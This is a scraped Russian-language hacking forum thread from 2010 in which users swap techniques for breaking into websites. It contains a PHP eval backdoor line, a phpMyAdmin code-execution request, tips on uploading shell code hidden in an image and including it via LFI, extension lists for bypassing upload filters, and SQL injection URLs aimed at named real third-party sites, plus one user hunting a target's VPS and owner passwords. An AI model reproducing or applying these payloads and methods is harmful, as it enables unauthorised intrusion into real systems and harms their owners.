 |
|

17.06.2010, 19:48
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от pinch
нет пробовал грит "файл с таким именем уже есть!"
В таком случае, поищи в админке LFI, очень часто именно в админской части сайта меньше всего защиты от атак. Достаточно часто сталкивался с таким способом заливки, когда льется только картинка, и хтаццесс не залить, то лил картинку набитую кодом шелла, и инклудил в админке.
|
|
|

17.06.2010, 19:55
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
если в хтацессе прописаны запрещенные разрешения, то тести
php phps php3 php5 phtml phps pht
|
|
|

17.06.2010, 20:03
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от m0Hze
Я не вникал в тему, но разве нельзя использовать {}?
Что-то вроде:
PHP код:
<?php
$sting = ${@eval($_REQUEST[c])};
?>
Конечно, если я правильно, и речь идет о pma code exec. У меня спокойно срабатывал такой вариант, ведь там помоему используется preg_replace, второй аргумент которого находится в двойных кавычках, что дает нам право на подстановку иполняемых данных. Опять же, если я правильно въехал.
//upd. Все верно, кавычки там идут лесом, вполне срабатывает такой запрос:
Код:
/phpmyadmin/server_databases.php?pos=0&dbstats=0&sort_by={${die(phpinfo())}}&sort_order=desc&token=1957
Э, я про /scripts/setup.php, я другую багу имел ввиду.
|
|
|

17.06.2010, 20:04
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
LFI на сайте и админке нигде нету, тестил расширения реультат 0 .....=((
|
|
|

17.06.2010, 23:57
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от Ctacok
Э, я про /scripts/setup.php, я другую багу имел ввиду.
Ну типо ми тоже про /scripts/setup.php. На проверь:
Код:
http://www.melancholy.ru/phpmyadmin/scripts/setup.php
и объясни мне все таки, юзал ли ты хоть раз этот сплойт и почему в данном случае (как и во всех других) он прекрасно работает и при magic_quotes=on
Если мы вообще говорим об одном и том же сплойте:
http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
про который вообще-то изначально писал wildshaman
|
|
|

18.06.2010, 00:15
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
Сообщение от None
http://www.lighterlifecommunity.co.uk/e107_plugins/userjournals_menu/userjournals.php?blog.-2719+union+select+1,2,@@version,4,5,6,7,8,9,10,11, 12,13+--+
5.0.81-log
А почему не работают обычные функции? Как например вывести данные из бд?
Или вот другой пример:
http://www.salvationprophecy.com/e107_plugins/userjournals_menu/userjournals.php?blog.-43++union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
там даже @@version не работает.
|
|
|

18.06.2010, 07:09
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Pashkela
Ну типо ми тоже про /scripts/setup.php. На проверь:
Код:
http://www.melancholy.ru/phpmyadmin/scripts/setup.php
и объясни мне все таки, юзал ли ты хоть раз этот сплойт и почему в данном случае (как и во всех других) он прекрасно работает и при magic_quotes=on
Если мы вообще говорим об одном и том же сплойте:
http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
про который вообще-то изначально писал wildshaman
Да причём сплойт, ты на саму багу посмотри, как ты закроешь открытую ковычку?
|
|
|

18.06.2010, 11:52
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами:
8789993
Репутация:
5
|
|
Скажу прямо...как узнать по имени домена где находится панель управления хостингом.
Может у вас есть варианты...всё перерыл ничего не нашел. кудато попал...но там ни данных подключения ничего нет...прсото написано, что у вас есть хостинг и всё )
|
|
|

18.06.2010, 11:58
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
whois -> dns.
ну там далее пробьёшь хостера, у хостера спросишь адрес панели.
|
|
|

18.06.2010, 12:45
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами:
8789993
Репутация:
5
|
|
Сообщение от Ctacok
whois -> dns.
ну там далее пробьёшь хостера, у хостера спросишь адрес панели.
Ага, спасибо так и сделал, хостер сказал что у вас домен резолвится на VPS а впс не наш. вобщем я нашел этот впс, нашел ссылки до phpmyadmin и ispmanagera....есть много инофрмации о хозяине. но не знаю что дальше делать....тупик.
Хотел восстановить на мыло пасы от ISP так оказывается нет такой функции...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|